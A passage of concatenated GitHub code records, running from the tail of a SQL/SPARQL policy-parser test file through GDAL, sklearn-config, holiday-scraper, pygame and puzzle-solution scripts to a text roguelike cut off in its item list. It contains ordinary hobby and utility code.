JOIN exam ON student.Id = exam.StudentId\n JOIN course ON exam.CourseId = course.Cid\n JOIN professor ON course.ProfCf = professor.Cf\n WHERE student.Id = \"12345678\"\n \"\"\"\n expectation = {\n \"student\": {\"Id\", \"Income\"},\n \"exam\": {\"StudentId\", \"CourseId\"},\n \"course\": {\"Cid\", \"ProfCf\"},\n \"professor\": {\"Cf\", \"Salary\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_is_operator():\n query = \"\"\"\n SELECT student.Id\n FROM student\n WHERE student.Ethnicity IS NOT NULL\n \"\"\"\n expectation = {\"student\": {\"Id\", \"Ethnicity\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_in_operator():\n query = \"\"\"\n SELECT student.Id\n FROM student\n WHERE student.Ethnicity IN (\"Asian\", \"Hispanic\")\n \"\"\"\n expectation = {\"student\": {\"Id\", \"Ethnicity\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\n# FUNCTIONS\ndef test_std_functions():\n query = \"\"\"\n SELECT COUNT(exam.CourseId)\n FROM student JOIN exam\n ON student.Id = exam.StudentId\n WHERE student.Id = \"12345678\" AND DATEDIFF(NOW(), exam.Date) < 365\n \"\"\"\n expectation = {\n \"student\": {\"Id\"},\n \"exam\": {\"StudentId\", \"CourseId\", \"Date\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_std_functions_modifier():\n query = \"\"\"\n SELECT COUNT(ALL exam.CourseId)\n FROM student JOIN exam\n ON student.Id = exam.StudentId\n \"\"\"\n expectation = {\"student\": {\"Id\"}, \"exam\": {\"StudentId\", \"CourseId\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_mosaicrown_functions():\n query = \"\"\"\n SELECT TOKENIZE(student.Id),\n L_DIVERSITY(student.Sex, student.Ethnicity, exam.Grade)\n FROM student JOIN exam\n ON student.Id = exam.StudentId\n WHERE exam.CourseId = \"DB\" AND DATEDIFF(NOW(), exam.Date) < 365\n \"\"\"\n expectation = {\n \"student\": {\n \"Id\",\n \"Id/tokenize\",\n \"Sex/l_diversity\",\n \"Ethnicity/l_diversity\"\n },\n \"exam\": {\n \"StudentId\",\n \"CourseId\",\n \"Date\",\n \"Grade/l_diversity\"\n }\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\n# CASE\ndef test_case():\n query = \"\"\"\n SELECT student.Id,\n CASE student.Ethnicity\n WHEN 'Asian' THEN 'Asia'\n WHEN 'Hispanic' THEN 'Latin America'\n ELSE 'Somewhere'\n END\n FROM student\n \"\"\"\n expectation = {\"student\": {\"Id\", \"Ethnicity\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_case_when():\n query = \"\"\"\n SELECT student.Id,\n CASE\n WHEN student.Income < 1000 THEN 'Nothing'\n WHEN student.Income < 1500 THEN 'Some'\n ELSE 'Maximum'\n END\n FROM student\n \"\"\"\n expectation = {\"student\": {\"Id\", \"Income\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\n# ALIAS\ndef test_select_with_alias():\n query = \"\"\"\n SELECT student.Id BadgeNumber,\n 12.546 AS F,\n \"something\" AS S,\n '' AS EMP, NULL AS N,\n student.Income / 12 AS Monthly,\n YEAR(student.BirthDate) AS YearOfBirth,\n CASE student.Sex\n WHEN 'M' THEN 'Male'\n WHEN 'F' < 1500 THEN 'Female'\n ELSE 'Other'\n END AS FullSex,\n (SELECT MAX(exam.Grade)\n FROM exam\n WHERE exam.StudentId = student.Id) AS MaxGrade\n FROM student\n \"\"\"\n expectation = {\n \"student\": {\"Id\", \"Income\", \"BirthDate\", \"Sex\"},\n \"exam\": {\"StudentId\", \"Grade\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_table_alias():\n query = \"\"\"\n SELECT S.Id, E.Date, E.CourseId, E.StudentId\n FROM student S, exam E\n \"\"\"\n expectation = {\n \"student\": {\"Id\"},\n \"exam\": {\"Date\", \"CourseId\", \"StudentId\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\n# requires knowledge of the schema\ndef test_cross_join_alias():\n query = \"\"\"\n SELECT SE.Id, SE.Date, SE.CourseId, SE.StudentId\n FROM (student, exam) SE\n \"\"\"\n with raises(Exception,\n match=\"Alias of complex tables is not supported yet.\"):\n SQLQuery(query)\n\n # expectation = {\n # \"student\": {\"Id\"},\n # \"exam\": {\"Date\", \"CourseId\", \"StudentId\"}\n # }\n # assert SQLQuery(query).get_targets() == expectation\n\n\n# requires knowledge of the schema\ndef test_inner_join_alias():\n query = \"\"\"\n SELECT SE.Sex, SE.Grade\n FROM (student INNER JOIN exam\n ON student.Id = exam.StudentId) SE\n \"\"\"\n with raises(Exception,\n match=\"Alias of complex tables is not supported yet.\"):\n SQLQuery(query)\n\n # expectation = {\"student\": {\"Id\", \"Sex\"}, \"exam\": {\"StudentId\", \"Grade\"}}\n # assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_inner_join_with_subquery_alias():\n query = \"\"\"\n select AB.b from (select A.a, B.b from A, B) AS AB join C on AB.a = C.a\n \"\"\"\n with raises(Exception,\n match=\"Alias of complex tables is not supported yet.\"):\n SQLQuery(query)\n\n # expectation = {\"A\": {\"a\"}, \"B\": {\"b\"}, \"C\": {\"a\"}}\n # assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_where_with_alias():\n query = \"\"\"\n SELECT student.Id BadgeNumber,\n student.Income / 12 AS Monthly,\n YEAR(student.BirthDate) AS YearOfBirth,\n CASE student.Sex\n WHEN 'M' THEN 'Male'\n WHEN 'F' < 1500 THEN 'Female'\n ELSE 'Other'\n END AS FullSex,\n (SELECT MAX(exam.Grade)\n FROM exam\n WHERE exam.StudentId = student.Id) AS MaxGrade\n FROM student\n WHERE BadgeNumber > \"12345678\" AND Monthly > 1000 AND\n YearOfBirth < 20 AND FullSex IN ('Female', 'Other') AND\n MaxGrade = 30\n \"\"\"\n expectation = {\n \"student\": {\"Id\", \"Income\", \"BirthDate\", \"Sex\"},\n \"exam\": {\"StudentId\", \"Grade\"}\n }\n assert SQLQuery(query).get_targets() == expectation\n\n\ndef test_aliases_everywhere():\n query = \"\"\"\n select C.c AS CC\n from (select A_T.a AS AA, B_T.b AS BB from A AS A_T, B AS B_T)\n join C on A.a = C.c\n where EXISTS(select D_T.d AS DD, E_T.e AS BB from D AS D_T, E AS E_T)\n \"\"\"\n expectation = {\"A\": {\"a\"}, \"B\": {\"b\"}, \"C\": {\"c\"}, \"D\": {\"d\"}, \"E\": {\"e\"}}\n assert SQLQuery(query).get_targets() == expectation\n\n\n# EXTRACT TARGETS FROM SPARQL QUERY\ndef test_simple_SPARQL_parsing():\n\n example = '''\n PREFIX dbpedia-owl: \n SELECT ?p ?h ?c WHERE {\n ?p a dbpedia-owl:Artist.\n ?h dbpedia-owl:birthPlace | dbpedia-owl:district ?c.\n ?c \"York\"@en.\n FILTER (?p IN (, )).\n FILTER (?p < 0.35)\n }\n '''\n # Extraction procedure and parse tree creation\n where, triples, tree, filters, prefix_dict = parse_SPARQL_query(example)\n\n # General control on dimension\n assert len(where) == 3 # 1 triple section + 2 filters\n assert len(triples) == 3 # 3 triples\n\n # Expected values\n subjects = [Variable(\"p\"), Variable(\"h\"), Variable(\"c\")]\n predicates = [\"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\",\n \"http://dbpedia.org/ontology/birthPlace OR http://dbpedia.org/ontology/district\",\n \"http://xmlns.com/foaf/0.1/name\"]\n objects = [\"http://dbpedia.org/ontology/Artist\", Variable(\"c\"), \"York\"]\n\n # Expected filters\n f_sub = [Variable(\"p\"), Variable(\"p\")]\n operators = [\"IN\", \"<\"]\n f_obj = ['http://example.org/JohnDoe, http://example.org/Jack', \"0.35\"]\n\n # Triples controls\n for triple in triples:\n assert extract_subject(triple) == subjects.pop(0)\n assert extract_predicates(triple, prefix_dict) == predicates.pop(0)\n assert extract_object(triple, prefix_dict) == objects.pop(0)\n\n # Filters controls\n for filter in filters:\n assert filter[0] == f_sub.pop(0)\n assert filter[1] == operators.pop(0)\n assert filter[2] == f_obj.pop(0)\n","repo_name":"mosaicrown/policy-engine","sub_path":"tests/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":14035,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23573089977","text":"import json\nfrom importlib import import_module\nfrom inspect import _empty, signature\n\n# for backwards compatibility - can be removed when we separate the hub branches for 0.6.x ad 0.5.x\nfrom .plots import eval_class_model, eval_model_v2 # noqa: F401\n\n\ndef get_class_fit(module_pkg_class: str):\n \"\"\"generate a model config\n :param module_pkg_class: str description of model, e.g.\n `sklearn.ensemble.RandomForestClassifier`\n \"\"\"\n splits = module_pkg_class.split(\".\")\n model_ = getattr(import_module(\".\".join(splits[:-1])), splits[-1])\n f = list(signature(model_().fit).parameters.items())\n d = {}\n for i in range(len(f)):\n d.update({f[i][0]: None if f[i][1].default is _empty else f[i][1].default})\n\n return {\n \"CLASS\": model_().get_params(),\n \"FIT\": d,\n \"META\": {\n \"pkg_version\": import_module(splits[0]).__version__,\n \"class\": module_pkg_class,\n },\n }\n\n\ndef gen_sklearn_model(model_pkg, skparams):\n \"\"\"generate an sklearn model configuration\n\n input can be either a \"package.module.class\" or\n a json file\n \"\"\"\n if model_pkg.endswith(\"json\"):\n model_config = json.load(open(model_pkg, \"r\"))\n else:\n model_config = get_class_fit(model_pkg)\n\n # we used to use skparams as is (without .items()) so supporting both cases for backwards compatibility\n skparams = skparams.items() if isinstance(skparams, dict) else skparams\n for k, v in skparams:\n if k.startswith(\"CLASS_\"):\n model_config[\"CLASS\"][k[6:]] = v\n if k.startswith(\"FIT_\"):\n model_config[\"FIT\"][k[4:]] = v\n\n return model_config\n","repo_name":"jasonnIguazio/ghpages-mlrun","sub_path":"mlrun/mlutils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22973556273","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 5 01:35:52 2018\n\n@author: ecology\n\"\"\"\n\nimport subprocess\nimport numpy as np\nfrom osgeo import gdal\n\ndef GetUTMTiffCorners(Filedirs):\n if type(Filedirs)==list:\n filedir=Filedirs[0]\n if type(Filedirs)==str:\n filedir=Filedirs\n gdalCMD=\"gdalinfo \"+filedir\n p= subprocess.Popen(gdalCMD,stdout=subprocess.PIPE,shell=True)\n out,err= p.communicate()\n out=str(out)\n upperleft= out[out.find(\"Upper Left\")+15:out.find(\"Upper Left\")+38]\n loweright= out[out.find(\"Lower Right\")+15:out.find(\"Lower Right\")+38]\n sul=upperleft.split(', ')\n slr=loweright.split(', ')\n top=float(sul[1])\n left=float(sul[0])\n right=float(slr[0])\n bottom=float(slr[1])\n print(\"Image data extent get!\")\n return np.array([top,left,right,bottom])\n\ndef ReadTiffAsNumpy(TiffList):\n print(\"Reading GeoTiff files...\")\n total=len(TiffList)\n tmpfiledir=TiffList[0]\n tmp=gdal.Open(tmpfiledir)\n ncol=tmp.RasterXSize\n nrow=tmp.RasterYSize\n Driver=tmp.GetDriver()\n GeoTransform=tmp.GetGeoTransform()\n Proj=tmp.GetProjection()\n OriData=np.zeros([nrow,ncol,total],dtype=np.float32)\n for i in range(total):\n data=gdal.Open(TiffList[i])\n OriData[:,:,i]=data.ReadAsArray().astype(np.float32)\n return [OriData,Driver,GeoTransform,Proj,nrow,ncol]\n\ndef WriteNumpyToTiff(TargetData,Driver,GeoTransform,Proj,nrow,ncol,nanDefault,filedirto,datatype='Float32'):\n if datatype=='Int16': \n output=Driver.Create(filedirto,ncol,nrow,1,gdal.GDT_Int16)\n TargetData=TargetData.astype(np.int16)\n elif datatype=='Int32':\n output=Driver.Create(filedirto,ncol,nrow,1,gdal.GDT_Int32)\n TargetData=TargetData.astype(np.int32) \n elif datatype=='UInt16': \n output=Driver.Create(filedirto,ncol,nrow,1,gdal.GDT_UInt16)\n TargetData=TargetData.astype(np.uint16)\n elif datatype=='UInt32':\n output=Driver.Create(filedirto,ncol,nrow,1,gdal.GDT_UInt32)\n TargetData=TargetData.astype(np.uint32) \n elif datatype=='Float32': \n output=Driver.Create(filedirto,ncol,nrow,1,gdal.GDT_Float32)\n TargetData=TargetData.astype(np.float32)\n elif datatype=='Float64':\n output=Driver.Create(filedirto,ncol,nrow,1,gdal.GDT_Float64)\n TargetData=TargetData.astype(np.float64) \n else:\n print(\"Data type not listed! Please choose from the bellowing:\")\n print(\"Int16 Int32 UInt16 UInt32 Float32 Float64\")\n output.SetGeoTransform(GeoTransform)\n output.SetProjection(Proj)\n outBand=output.GetRasterBand(1)\n# outBand.SetNoDataValue(nanDefault) \n outBand.WriteArray(TargetData,0,0)\n outBand.FlushCache()\n ","repo_name":"ZH-pku/xgb_vegetation_mapping","sub_path":"feature_computing/geographic_features/codes/processgeotiff.py","file_name":"processgeotiff.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"7054316499","text":"# Problem No.: 2775\n# Solver: Jinmin Goh\n# Date: 20200309\n# URL: https://www.acmicpc.net/problem/2775\n\nimport sys\n\ndef main():\n n = int(input())\n nums = []\n for i in range(n):\n temp = []\n temp.append(int(input()))\n temp.append(int(input()))\n nums.append(temp)\n table = [[0] * 14 for i in range(15)]\n table[0] = [i + 1 for i in range(14)]\n for i in range(1,15):\n for j in range(14):\n table[i][j] = sum(table[i - 1][:j + 1])\n for i in nums:\n print(table[i[0]][i[1] - 1])\n return\n\nif __name__ == \"__main__\":\n main()","repo_name":"Jinmin-Goh/BOJ_PS","sub_path":"Solved/02775/02775.py","file_name":"02775.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22535780253","text":"import requests\nimport json\nimport dateutil\nimport pandas as pd\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport datetime as dt\nimport csv\nfrom icalendar import Calendar, Event\n\n#Get iso code for available countries on website\nmy_url = \"https://www.officeholidays.com/ics/\"\nuClient = urlopen(my_url)\npage_html = uClient.read()\nuClient.close()\npage_soup = BeautifulSoup(page_html, \"html.parser\")\nfish_soup = page_soup.find(\"table\",{\"class\":\"info-table\"}).findAll(\"a\")\niso_code = []\nfor fish in fish_soup:\n iso_code.append(fish[\"href\"][-2:])\n\n#Read ics file and output results\nwith open(\"holiday.csv\",'w',encoding = 'UTF-8', newline='') as fd:\n writer = csv.writer(fd)\n writer.writerow([\"Location\",\"Category\", \"Title\", \"Date\"])\n base_url = \"https://www.officeholidays.com/ics/ics_country_code.php?iso=\"\n for iso in iso_code:\n url = base_url + iso\n response = requests.get(url)\n gcal = Calendar.from_ical(response.content) #Convert into ics \n for component in gcal.walk():\n if component.name == \"VEVENT\" and dateutil.parser.parse(component.get('dtstart').to_ical()).date() > dt.date.today():\n row = [\n component.get('summary').split(\":\")[0].strip(), # Get Country\n \"Holiday\",\n component.get('summary').split(\":\")[1].strip(), # Get name of Holiday\n dateutil.parser.parse(component.get('dtstart').to_ical()).date() \n ]\n writer.writerow(row)","repo_name":"thisisbowen/Extract_Holidays_from_ics","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5595906168","text":"import pygame\nimport os, sys, random\n\npygame.init()\n\nscr_size = (width,height) = (600,150)\nFPS = 60\ngravity = 0.6\n\nblack = (0,0,0)\nwhite = (255,255,255)\nbackground_col = (235,235,235)\n\nscreen = pygame.display.set_mode(scr_size)\nclock = pygame.time.Clock()\npygame.display.set_caption(\"T-Rex Rush\")\nkPoint_sound = pygame.mixer.Sound('sprites/checkPoint.wav')\n\ndef load_image(\n name,\n sizex=-1,\n sizey=-1,\n colorkey=None,\n ):\n\n fullname = os.path.join('sprites', name)\n image = pygame.image.load(fullname)\n image = image.convert()\n if colorkey is not None:\n if colorkey is -1:\n colorkey = image.get_at((0, 0))\n image.set_colorkey(colorkey, RLEACCEL)\n\n if sizex != -1 or sizey != -1:\n image = pygame.transform.scale(image, (sizex, sizey))\n\n return (image, image.get_rect())\n\ndef load_sprite_sheet(\n sheetname,\n nx,\n ny,\n scalex = -1,\n scaley = -1,\n colorkey = None,\n ):\n fullname = os.path.join('sprites',sheetname)\n sheet = pygame.image.load(fullname)\n sheet = sheet.convert()\n\n sheet_rect = sheet.get_rect()\n\n sprites = []\n\n sizex = sheet_rect.width/nx\n sizey = sheet_rect.height/ny\n\n for i in range(0,ny):\n for j in range(0,nx):\n rect = pygame.Rect((j*sizex,i*sizey,sizex,sizey))\n image = pygame.Surface(rect.size)\n image = image.convert()\n image.blit(sheet,(0,0),rect)\n\n if colorkey is not None:\n if colorkey is -1:\n colorkey = image.get_at((0,0))\n image.set_colorkey(colorkey,RLEACCEL)\n\n if scalex != -1 or scaley != -1:\n image = pygame.transform.scale(image,(scalex,scaley))\n\n sprites.append(image)\n\n sprite_rect = sprites[0].get_rect()\n\n return sprites,sprite_rect\n\ndef disp_gameOver_msg(retbutton_image,gameover_image):\n retbutton_rect = retbutton_image.get_rect()\n retbutton_rect.centerx = width / 2\n retbutton_rect.top = height*0.52\n\n gameover_rect = gameover_image.get_rect()\n gameover_rect.centerx = width / 2\n gameover_rect.centery = height*0.35\n\n screen.blit(retbutton_image, retbutton_rect)\n screen.blit(gameover_image, gameover_rect)\n\ndef extractDigits(number):\n if number > -1:\n digits = []\n i = 0\n while(number/10 != 0):\n digits.append(number%10)\n number = int(number/10)\n\n digits.append(number%10)\n for i in range(len(digits),5):\n digits.append(0)\n digits.reverse()\n return digits\n\ndef gameplay():\n # global high_score\n gamespeed = 4\n startMenu = False\n gameOver = False\n gameQuit = False\n playerDino = Dino(44,47)\n new_ground = Ground(-1*gamespeed)\n counter = 0\n\n cacti = pygame.sprite.Group()\n pteras = pygame.sprite.Group()\n clouds = pygame.sprite.Group()\n last_obstacle = pygame.sprite.Group()\n\n Cactus.containers = cacti\n Ptera.containers = pteras\n Cloud.containers = clouds\n\n retbutton_image,retbutton_rect = load_image('replay_button.png',35,31,-1)\n gameover_image,gameover_rect = load_image('game_over.png',190,11,-1)\n\n temp_images,temp_rect = load_sprite_sheet('numbers.png',12,1,11,int(11*6/5),-1)\n HI_image = pygame.Surface((22,int(11*6/5)))\n HI_rect = HI_image.get_rect()\n HI_image.fill(background_col)\n HI_image.blit(temp_images[10],temp_rect)\n temp_rect.left += temp_rect.width\n HI_image.blit(temp_images[11],temp_rect)\n HI_rect.top = height*0.1\n HI_rect.left = width*0.73\n\n while not gameQuit:\n while startMenu:\n pass\n while not gameOver:\n if pygame.display.get_surface() == None:\n print(\"Couldn't load display surface\")\n gameQuit = True\n gameOver = True\n else:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n gameQuit = True\n gameOver = True\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n if playerDino.rect.bottom == int(0.98*height):\n playerDino.isJumping = True\n playerDino.movement[1] = -1*playerDino.jumpSpeed\n\n if event.key == pygame.K_DOWN:\n if not (playerDino.isJumping and playerDino.isDead):\n playerDino.isDucking = True\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_DOWN:\n playerDino.isDucking = False\n for c in cacti:\n c.movement[0] = -1*gamespeed\n if pygame.sprite.collide_mask(playerDino,c):\n playerDino.isDead = True\n\n for p in pteras:\n p.movement[0] = -1*gamespeed\n if pygame.sprite.collide_mask(playerDino,p):\n playerDino.isDead = True\n\n if len(cacti) < 2:\n if len(cacti) == 0:\n last_obstacle.empty()\n last_obstacle.add(Cactus(gamespeed,40,40))\n else:\n for l in last_obstacle:\n if l.rect.right < width*0.7 and random.randrange(0,50) == 10:\n last_obstacle.empty()\n last_obstacle.add(Cactus(gamespeed, 40, 40))\n\n if len(pteras) == 0 and random.randrange(0,200) == 10 and counter > 500:\n for l in last_obstacle:\n if l.rect.right < width*0.8:\n last_obstacle.empty()\n last_obstacle.add(Ptera(gamespeed, 46, 40))\n\n if len(clouds) < 5 and random.randrange(0,300) == 10:\n Cloud(width,random.randrange(height/5,height/2))\n\n playerDino.update()\n cacti.update()\n pteras.update()\n clouds.update()\n new_ground.update()\n\n if pygame.display.get_surface() != None:\n screen.fill(background_col)\n new_ground.draw()\n clouds.draw(screen)\n cacti.draw(screen)\n pteras.draw(screen)\n playerDino.draw()\n\n pygame.display.update()\n clock.tick(FPS)\n\n if playerDino.isDead:\n gameOver = True\n\n if counter%700 == 699:\n new_ground.speed -= 1\n gamespeed += 1\n\n counter = (counter + 1)\n\n if gameQuit:\n break\n\n while gameOver:\n if pygame.display.get_surface() == None:\n print(\"Couldn't load display surface\")\n gameQuit = True\n gameOver = False\n else:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n gameQuit = True\n gameOver = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n gameQuit = True\n gameOver = False\n\n if event.key == pygame.K_RETURN or event.key == pygame.K_SPACE:\n gameOver = False\n gameplay()\n if pygame.display.get_surface() != None:\n disp_gameOver_msg(retbutton_image,gameover_image)\n pygame.display.update()\n clock.tick(FPS)\n\n pygame.quit()\n quit()\n\ndef main():\n gameplay()\n\nmain()","repo_name":"nomadlife/python-exercise","sub_path":"Module_pygame/pygame_trex_reverse_1.py","file_name":"pygame_trex_reverse_1.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42397640142","text":"\nfrom injection import input_injection\nfrom year2022.day07.a import get_data\n\n\n@input_injection\ndef main(_input: str) -> str:\n result: int = 0\n\n space_used, tree = get_data(_input)\n\n total_space = 70000000\n need_space = 30000000\n\n free_up = need_space - (total_space - space_used)\n\n possible_dirs = [v for v in tree.values() if v >= free_up]\n result = min(possible_dirs)\n\n return str(result)\n\n\nif __name__ == \"__main__\":\n print(main())\n","repo_name":"justcallmelarry/advent-of-code","sub_path":"src/year2022/day07/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6222103129","text":"# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param preorder, a list of integers\n # @param inorder, a list of integers\n # @return a tree node\n def buildTree(self, preorder, inorder):\n n = len(preorder)\n if n == 0:\n return None\n if n == 1:\n return TreeNode(preorder[0])\n \n root = TreeNode(preorder[0])\n k = inorder.index(preorder[0])\n root.left = self.buildTree(preorder[1:k+1], inorder[:k])\n root.right = self.buildTree(preorder[k+1:], inorder[k+1:])\n return root\n","repo_name":"Shuaiyicao/leetcode-python","sub_path":"105.py","file_name":"105.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10595378659","text":"import random\n\n\ndef merge_sort(lst):\n \"\"\"归并排序\"\"\"\n if len(lst) <= 1: # 分开到列表只剩下一个值\n return lst\n num = len(lst) // 2 # 每次对半分开\n left = merge_sort(lst[:num]) # 分开一个个左列表\n right = merge_sort(lst[num:]) # 分开一个个右列表\n return merge(left, right) # 分开完之后, 一个个归并\n\n\ndef merge(left, right):\n \"\"\"归并部分\"\"\"\n l, r = 0, 0 # 左右指针\n result = [] # 合并后的新表\n while l < len(left) and r < len(right): # 移动左右指针的值\n if left[l] < right[r]: # 比较左右两边的值\n result.append(left[l])\n l += 1\n else:\n result.append(right[r])\n r += 1\n result += left[l:] # 最后有一个值没有对手比较, 不确定在哪个表\n result += right[r:] # 左右有个指针会移出去(大于下标), 有个列表是空的\n return result\n\n\nif __name__ == '__main__':\n li = list(range(100))\n random.shuffle(li)\n print(li)\n li_ = merge_sort(li)\n print(li_)\n\n\n\"\"\"\n归并排序\n2个函数\n1. 递归分开列表, return合并列表函数\n2. 合并列表函数\n\n\n详细\n1. 函数\n递归停止条件, 分开列表只有一个值\n指定分割值\n左列表分割递归\n右列表分割递归\n返回 合并列表函数\n\n\n2. 函数\n设定左右指针初始值\n设定接受列表为空\n\n\n左右列表比对循环\n指针不超过左右列表长度\nif 左右值比对\n\t加入接受列表\n\t左指针加一\nelse \n\t相反\n接受列表 += 剩下的值\n返回 接受列表\n\"\"\"","repo_name":"pol9111/algorithms","sub_path":"排序/归并排序.py","file_name":"归并排序.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71446023208","text":"import os\nimport keyboard\nimport random\nimport time\nimport urllib.request\nfrom datetime import datetime\nclear = lambda: os.system('cls')\ncolor = lambda: os.system('color 4F')\nexit = False\n\n# X Y Icon\n# 0 1 2\nplayer = [6, 7, \"@\"]\n\n\t\t\t\t\t\t\t# X\t\tY\tType\tCurrentHP \tWorld\nenemies_currently_generated = []\nmap = []\nworlds = [\n\t[\t\"................................................................M \",\n\t\t\"...... \",\n\t\t\"...... \",\n\t\t\"...... \",\n\t\t\"...... \",\n\t\t\"...... \",\n\t\t\"...... \",\n\t\t\"...... \",#World 0\n\t\t\"...... \",\n\t\t\"...... \",\n\t\t\" !!! \",\n\t\t\" \"\n\t],[\n\t\t\" #@@@# \",\n\t\t\"#####...########################## \",\n\t\t\">................................# \",\n\t\t\">..................######........# \",\n\t\t\">.......................########## \",\n\t\t\"~~~~~~>......................$ \",\n\t\t\"~~~~~~>......................$ \",\n\t\t\">............################# \", #World 1\n\t\t\">......#.....# \",\n\t\t\">......#.....# \",\n\t\t\"############## \",\n\t\t\" \"\n\t],[\n\t\t\"W######################################### \",\n\t\t\".........................................# \",\n\t\t\".... ....# \",\n\t\t\".... ....###########****##########\",\n\t\t\"......###############...........................................#\",\n\t\t\"~~~~..###.......................................................#\",\n\t\t\"!.....###############...........................................#\", #World 2\n\t\t\"!...............................................................#\",\n\t\t\"~~~~ ~~~~~~~ #\",\n\t\t\" \",\n\t\t\" \",\n\t\t\" \"\n\t],[\n\t\t\"############## \",\n\t\t\".............0 \",\n\t\t\".............# \",\n\t\t\"......####. \",\n\t\t\"......####. \",\n\t\t\".......... \", #World 3\n\t\t\"...... \",\n\t\t\"...... \",\n\t\t\"...... \",\n\t\t\"... \",\n\t\t\". \",\n\t\t\"$ \" \n\t],[\n\t\t\" ################################### \",\n\t\t\" ..................................# \",\n\t\t\"W........ * \",\n\t\t\"###...... \",\n\t\t\"### ...#########......... .................. \",\n\t\t\" ......................................... \",\n\t\t\" ###############.............................. \",\n\t\t\" ........................................... \", #World 4\n\t\t\" ...... \",\n\t\t\" ...... \",\n\t\t\" .. \",\n\t\t\" ## \"\n\t],[\n\t\t\" ############## MMMM# \",\n\t\t\"###0 .............# ....# \",\n\t\t\".... . .... ### ....# \",\n\t\t\".... . .....###### ....##########\",\n\t\t\". ...........................................#\",\n\t\t\". ###.......................................................#\", #World 5\n\t\t\"......### ...........................................#\",\n\t\t\" .. .... .. ......................... \",\n\t\t\" .... . .. .. ......................... \",\n\t\t\" ......... .. .. .... \",\n\t\t\" .. .. .... \",\n\t\t\" ...... $$$$ \"\n\t],[\n\t\t\"@....... ..... \",\n\t\t\" .. ....... ............ . . \",\n\t\t\" .. ... . . . . . . \",\n\t\t\" ........ . .... . . ........ . \",\n\t\t\" .. . . . . . . . \",\n\t\t\" .. ...... . .... . . ........ \",\n\t\t\" .. . . . . . \", #World 6\n\t\t\" .. . . .......... . .............. \",\n\t\t\" .. ............. . . . \",\n\t\t\"### .. . . . \",\n\t\t\"##[..... . . .... \",\n\t\t\"### ............. **** \"\n\t]\n]\ntriggersRaisin = [\n# From To ΔX ΔY\n# 0 1 2 3\n\t[1, 2, -29, 1],\n\t[1, 0, -4, 10],\n\t[2, 5, 0 , 8],\n\t[2, 3, 0, 11], \n\t[0, 6, -64, 0],\n\t[6, 5, -9,-11],\n\t[5, 4, 37 , 1], \n\t[3, 4, -13, 1] \n] \ngetOutofHere = [\"@\",\"!\",\"$\",\"W\",\"0\",\"*\",\"M\"]\n\nwhereYouAt = False #boolean that defines if the player has just changed maps\nwuhtChuWant = False #boolean that tells us if you don't want to pick up an item\n\nitem_high = 35\nitem_low = 1\n\nmax_y = 11\nmax_x = 65\n\nmaxHP = 10\ncurrentHP = 10\nattack = 2\ndefense = 0\nlevel = 0 \nXP = 0\n\nenemies = [ #description of enemy #HP #Attack #defense #XP worth #rarity #character\n\t[\"a medium sized raccoon. It stares at you with its eyes\", 10, 3, 2, 20, 15, \"D\", \"%\"],\n\t[\"a swarm of angry squirrel. They're making buzzing noises\",10, 2, 3 , 15, 20, \"O\", \"%\"],\n\t[\"a passed out homeless person\", 10, 0, 1, 5, 25, \"L\", \"&\"],\n\t[\"a young child who's lost their mother. They're shouting at you\" ,8, 4, 1, 15, 15,\"G\", \"&\"],\n\t[\"a cow. Why is there a cow???\", 15, 1 , 3, 15, 15,\"F\", \"%\"],\n\t[\"a tourist asking for directions. You have no idea how to help\", 10, 2, 4, 15, 15,\"H\", \"&\"],\n\t[\"a teenager that just got off their shift at Taco Bell. Where's your crunch wrap?\", 8, 5, 2, 20, 15,\"J\", \"&\"] #Note character is not what is displayed\n]\n\nitems = [\n\t#name #HP increase #attack increase #defense increase #level increase #XP increase #rarity #quantity \n\t[\"a pouch of Capri Sun\", 2, 0, 0, 0, 0, 20, 0],\n\t[\"a half eaten chocolate bar\", 